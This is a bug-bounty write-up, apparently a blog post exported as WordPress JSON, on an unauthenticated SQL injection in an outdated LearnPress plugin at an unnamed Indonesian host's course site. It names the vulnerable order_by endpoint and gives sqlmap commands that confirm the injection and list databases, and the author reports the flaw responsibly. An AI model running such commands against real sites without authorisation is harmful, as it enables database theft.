{"id":234,"date":"2024-11-20T08:19:00","date_gmt":"2024-11-20T01:19:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=234"},"modified":"2025-10-14T10:07:57","modified_gmt":"2025-10-14T03:07:57","slug":"critical-sql-injection-in-a-major-indonesian-web-hosting-platform","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/critical-sql-injection-in-a-major-indonesian-web-hosting-platform\/","title":{"rendered":"Critical SQL Injection in a Major Indonesian Web Hosting Platform"},"content":{"rendered":"\n<p>While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability.<\/p>\n\n\n\n<p>I accessed the website and identified that it used <strong>WordPress<\/strong> with the <strong>LearnPress plugin<\/strong>. Upon further investigation, I found that their LearnPress plugin was outdated and vulnerable to SQL injection. According to Wordfence, the affected versions were detailed as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Title:<\/strong> LearnPress &lt;= 4.2.5.7 &#8211; Unauthenticated SQL Injection via order_by<\/li>\n\n\n\n<li><strong>Reference:<\/strong> <a href=\"https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/learnpress\/learnpress-4257-unauthenticated-sql-injection-via-order-by\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/learnpress\/learnpress-4257-unauthenticated-sql-injection-via-order-by<\/a><\/li>\n<\/ul>\n\n\n\n<p>The Wordfence post highlighted the <strong><code>order_by<\/code><\/strong> parameter as the vulnerable entry point. I examined the website and found an API endpoint that used this parameter:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>https:&#47;&#47;example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular<\/code><\/pre>\n\n\n\n<p>This endpoint, used for fetching courses via AJAX, was a prime target for SQL injection testing.<\/p>\n\n\n\n<p>To verify the vulnerability, I utilized <strong>sqlmap<\/strong>, a powerful SQL injection testing tool. First, I ran a basic scan to confirm the injection point:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/sqlmap -u \"https:\/\/example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular*\" --random-agent --level=3 --risk=3  <\/code><\/pre>\n\n\n\n<p>The (*) character after the order_by parameter marks the injection point for sqlmap.<\/p>\n\n\n\n<p>The scan results confirmed that the parameter was vulnerable. Next, I listed the available databases to assess the extent of the compromise:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/sqlmap -u \"https:\/\/example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular*\" --random-agent --level=3 --risk=3 --dbs  <\/code><\/pre>\n\n\n\n<p><strong>Result:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"838\" height=\"394\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2.png\" alt=\"\" class=\"wp-image-287\" style=\"width:347px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2.png 838w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2-300x141.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2-768x361.png 768w\" sizes=\"auto, (max-width: 838px) 100vw, 838px\" \/><\/figure>\n\n\n\n<p>Upon confirming the vulnerability, I immediately reported it to the company. Recognizing the severity of the issue, they promptly acknowledged the report and rewarded me with <strong>3 months of free hosting<\/strong> as a token of appreciation for identifying and responsibly disclosing the critical SQL injection vulnerability.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Related Articles<\/h3>\n\n\n\n<p>If you&#8217;re interested in more bug bounty stories, check out my writeups on vulnerabilities in other Indonesian web hosting platforms:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/n45ht.or.id\/blog\/post-based-xss-on-domainesia\/\">POST-based XSS on DomaiNesia<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/n45ht.or.id\/blog\/reflected-dom-based-xss-on-domainesia\/\">Reflected DOM-based XSS on DomaiNesia<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/1337.or.id\/post\/1000-idor-755516dd0fcd\">$1.000 IDOR @ Indonesian Webhost<\/a><\/li>\n<\/ul>\n\n\n\n<p>Thank you for reading, and happy hacking!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability. I accessed the website and identified that [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":286,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,30],"class_list":["post-234","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-sql-injection"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=234"}],"version-history":[{"count":5,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions"}],"predecessor-version":[{"id":289,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions\/289"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/286"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}